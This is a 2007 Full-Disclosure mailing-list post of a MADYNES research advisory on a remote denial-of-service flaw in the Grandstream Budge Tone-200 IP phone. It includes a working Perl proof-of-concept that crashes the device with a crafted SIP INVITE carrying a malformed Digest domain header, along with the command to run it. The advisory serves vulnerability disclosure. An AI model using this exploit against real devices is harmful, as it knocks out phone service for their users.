| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <5m8j6b$aaucn@ironport1.loria.fr>
Date: Wed, 21 Mar 2007 12:06:57 +0100
From: "Radu State" <state@...ia.fr>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Grandstream Budge Tone-200 denial of service
vulnerability
MADYNES Security Advisory
<http://madynes.loria.fr/> http://madynes.loria.fr
Title: Grandstream Budge Tone-200 denial of service vulnerability
Release Date:
21/03/2007
Severity:
High - Denial of Service
Advisory ID:KIPH3
Hardware: Grandstream Budge Tone-200 IP Phone
http://www.grandstream.com/consumerphones.html
Affected Versions: Program-- 1.1.1.14 Bootloader-- 1.1.1.5
Other versions maybe.
Vulnerability Synopsis: After sending a crafted INVITE/CANCE or any message
with a "WWW-Authenticate" where the "Digest domain" is crafted the device
freezes provoking a DoS.
Impact: A remote individual can remotely crash and perform a Denial of
Service(DoS) attack in all the services provided by the software by sending
one crafted SIP INVITE message. This is conceptually similar to the "ping of
death".
Resolution: The vendor was contacted at multiple times, the complete report
was sent, but no feedback whatsoever resulted.
Vulnerability Description: the device reboots after a crafted INVITE message
had been sent.
Configuration of our device:
Software Version: Program-- 1.1.1.14 Bootloader-- 1.1.1.5
IP-Address obtained by DHCP as 192.168.1.105
The configuration is the default
Vulnerability:
After sending a crafted INVITE, CANCEL or any message with a
"WWW-Authenticate" where the "Digest domain" is crafted the device freezes
provoking a DoS.
Exploit:
To run the exploit the file invite_grandstream.pl should be launched
(assuming our configurations) as:
perl invite_grandstream.pl 192.168.1.105 5060 Fosforito
Proof of Concept Code:
#!/usr/bin/perl
use IO::Socket::INET;
die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);
$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],
Proto=>'udp',
PeerAddr=>$ARGV[0]);
$AUTH = "WWW-Authenticate: Digest
domain=\"/-+:\@=\$\%D6\$;\$=;=\$=\$,\@\$.=;\@;;,&&+:::=\@/2\$&;6+;+=\%A5==;\
@:=;\$&\%A3:u,\@=\@;&;\@+::+&;+,,&/&\@=,;=&:&,=&:;:;;K+&\@=\%DA*\$;\@&+&:;/=
=\%37:\%A6;,\@\%ED,:=:\@,;\%DA;&\$)\$+=;+:\%FE\$:\@;&=,W;,g\%EF;\%FB:+\@O\$+
\%AF+;+:,&=\%CA\%EA;\$,\@+/;\@,-;:;,P&\@;_\$:\%C7&+&/!,\%EE\$:,\@:;;\@&\@,+,
z\@\$;\@\@\$\$::\@/=,\$3\%ED=\@+\%AE/=&\@;;\$;&\$\%FE:\@;\$+:\$\%EB\$=&:;&K&
;:\@\%EA,=\%BA6\%21;=&:\$\"\r\n";
$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP
192.168.1.2;branch=z9hG4bK056a27e7;rport\r\nFrom:
<sip:tucu\@192.168.1.2>;tag=as011d1185\r\nTo:
<sip:$ARGV[2]\@$ARGV[0]>;$TOTAG\r\n$AUTH\CSeq: 6106 INVITE\r\Max-Forwards:
70\r\nContent-Length: 0\r\n\r\n";
$socket->send($msg);
Credits:
Humberto J. Abdelnur (Ph.D Student)
Radu State (Ph.D)
Olivier Festor (Ph.D)
This vulnerability was identified by the Madynes research team at
INRIA
Lorraine, using the Madynes VoIP fuzzer.
<http://madynes.loria.fr/> http://madynes.loria.fr/
Disclosure Distribution:
The advisory will be posted on the following websites:
<http://madynes.loria.fr/> http://madynes.loria.fr website
The advisory will be posted to the following mailing lists:
1) full-disclosure@...ts.grok.org.uk
2) voipsec@...isa.org
Information about us: Madynes is a research team at INRIA Lorraine working
on VoIP Security assessment, intrusion detection and prevention.
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists